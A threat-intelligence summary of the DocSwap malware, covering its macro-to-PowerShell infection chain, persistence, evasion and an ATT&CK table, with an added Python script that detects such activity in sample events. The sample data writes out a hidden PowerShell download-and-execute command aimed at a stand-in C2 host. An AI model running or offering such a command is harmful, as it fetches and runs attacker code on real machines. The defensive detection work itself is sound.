EXECUTIVE SUMMARY:
DocSwap is malware disguised as a security document viewer, designed to deceive users into executing malicious files. It targets IT professionals and security researchers, likely aiming to steal sensitive data. By mimicking credible cybersecurity alerts, DocSwap exploits trust to infiltrate systems. Its persistence mechanisms and ability to evade detection make it a serious threat.
DocSwap’s infection chain starts with a malicious document containing macros that trigger PowerShell commands to download payloads. The malware embeds its code in legitimate-looking files to bypass detection. It modifies registry keys for persistence and communicates with a C2 server for remote commands and data theft. Its sandbox evasion tactics further enhance its stealth.
DocSwap highlights evolving malware tactics that blend deception with advanced evasion techniques. Its focus on security professionals suggests espionage motives. To reduce risk, organizations should adopt strong email filtering, conduct security training, and deploy behavior-based threat detection tools. Proactive measures are essential to counter threats like DocSwap.
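As an added illustration of the behaviour-based detection the summary recommends (not code from the original report or from any vendor tool), the script below applies two rules drawn from the chain described above, an Office application spawning PowerShell with a download command and a write to a Run key, to constructed process and registry events. The event shape, field names and sample values are assumptions, not DocSwap telemetry.

```python
import re
from dataclasses import dataclass

# Parent images whose PowerShell children are suspicious (macro -> PowerShell stage).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Command-line markers typical of a PowerShell download/decoding stage.
DOWNLOAD_MARKERS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"\bcurl\b|-enc(odedcommand)?\b|frombase64string)", re.IGNORECASE)
# Autostart locations used for registry persistence (T1547).
RUN_KEYS = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)

@dataclass
class Event:
    kind: str          # "process" (creation) or "registry" (value set)
    image: str         # image of the acting process
    parent: str = ""   # parent image, process events only
    cmdline: str = ""  # command line, process events only
    target: str = ""   # registry path, registry events only

def classify(ev):
    """Return detection labels for one event; an empty list means no rule fired."""
    hits = []
    if ev.kind == "process":
        child = ev.image.rsplit("\\", 1)[-1].lower()
        parent = ev.parent.rsplit("\\", 1)[-1].lower()
        if child in ("powershell.exe", "pwsh.exe") and parent in OFFICE_PARENTS:
            hits.append("office-spawned-powershell")
            if DOWNLOAD_MARKERS.search(ev.cmdline):
                hits.append("powershell-download-cradle")
    elif ev.kind == "registry" and RUN_KEYS.search(ev.target):
        hits.append("run-key-persistence")
    return hits

def scan(events):
    """Run every rule over a sequence of events; returns (index, label) pairs."""
    return [(i, h) for i, ev in enumerate(events) for h in classify(ev)]

# Constructed sample telemetry (hypothetical paths and hostnames).
SAMPLE = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          cmdline="powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                  ".DownloadString('http://c2.example.invalid/stage')\""),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Windows\explorer.exe", cmdline="powershell Get-ChildItem"),
    Event("registry", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("registry", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          target=r"HKCU\Software\Microsoft\Office\16.0\Word\Options"),
]
```

In production these rules belong in the EDR or SIEM rule language rather than a script; the parent/child and Run-key checks map directly onto process-creation and registry-set events such as Sysmon event IDs 1 and 13.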
THREAT PROFILE:
| Tactic | Technique ID | Technique |
|---|---|---|
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Discovery | T1083 | File and Directory Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/north-korean-hackers-deploy-docswap-malware-disguised-as-security-app/